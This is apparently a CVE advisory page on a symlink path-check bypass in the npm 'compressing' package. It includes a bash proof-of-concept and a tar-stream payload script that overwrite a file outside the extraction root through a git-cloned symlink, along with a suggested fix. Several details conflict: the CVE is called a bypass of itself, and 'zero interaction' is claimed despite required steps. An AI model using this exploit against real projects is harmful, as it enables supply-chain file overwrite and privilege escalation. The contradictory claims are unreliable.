npm package compressing, Partial Fix Bypass, CVE-2026-24884 (critical)


How CVE-2026-24884 Works

The vulnerability is a Partial Fix Bypass of CVE-2026-24884 in the `compressing` npm package (tested on v2.1.0). The library's `isPathWithinParent()` utility uses `path.resolve(childPath)` to validate paths, a purely logical string operation that does not check the actual filesystem state. If the extraction target is `/app/out` and an entry is `config/passwd`, `path.resolve` returns `/app/out/config/passwd`. Since this string starts with `/app/out/`, the check returns true. However, if an attacker has pre-planted a symbolic link on disk at `/app/out/config` pointing to `/etc`, the OS kernel follows the link when the library calls `fs.writeFile('/app/out/config/passwd', data)`. The OS resolves the path to `/etc/passwd`, while the library believes it is writing inside the safe directory. This "logical vs. physical" divergence allows arbitrary file writes outside the intended extraction root. Git natively preserves symlinks during clone, making supply-chain attacks trivial: a victim only needs to run `git clone` and `node app.js`.

dailycve form

Platform: npm package
Version: 2.1.0
Vulnerability: Partial fix bypass
Severity: Critical
Date: 2026-04-17

Prediction: Not yet patched

What Undercode Say:

```bash
# Workspace setup
mkdir -p ~/poc-workspace
cd ~/poc-workspace
mkdir -p /tmp/fake_root/etc
echo "root:SAFE_DATA_DO_NOT_OVERWRITE" > /tmp/fake_root/etc/passwd
npm install compressing@2.1.0 tar-stream

# Create poisoned symlink
mkdir compressing_poc_test && cd compressing_poc_test
git init
ln -s /tmp/fake_root/etc/passwd config_file
git branch -M main
git remote add origin https://github.com/USERNAME/compressing_poc_test.git

# Generate payload.tar (gen_payload.js is the script in the Exploit section)
node gen_payload.js
mv ../payload.tar .
git add . && git commit -m "Add payload" && git push -u origin main

# Victim clones and runs
cd ~/poc-workspace
git clone https://github.com/USERNAME/compressing_poc_test.git victim_app
cd victim_app
node victim_app.js   # triggers the overwrite
```

Exploit (gen_payload.js):

```javascript
const tar = require('tar-stream');
const fs = require('fs');
const pack = tar.pack();
// PAYLOAD: A plain file that matches the symlink name
pack.entry({ name: 'config_file' }, 'root:PWNED_BY_THE_SUPPLY_CHAIN_ATTACK_V2.1.0\n');
pack.finalize();
pack.pipe(fs.createWriteStream('./payload.tar'));
console.log('payload.tar generated successfully!');
```

Protection from this CVE

Replace the string-based validation with state-aware recursive checks using `fs.lstatSync`. The secure `secureIsPathWithinParent()` function iterates through every segment of the path on disk. If any component is a symbolic link, it throws a security exception before `fs.writeFile` can follow the link. This ensures the logical path and the physical path are identical, closing the divergence that the exploit relies on.

Impact:

  • Arbitrary file overwrite outside the extraction root
  • Privilege escalation (overwrite `/etc/passwd` or `/etc/shadow`)
  • Remote code execution (overwrite binaries or startup scripts)
  • Data corruption and permanent data loss
  • Supply-chain compromise via Git clone with zero victim interaction

Sources:

Reported By: github.com
Extra Source Hub:
Undercode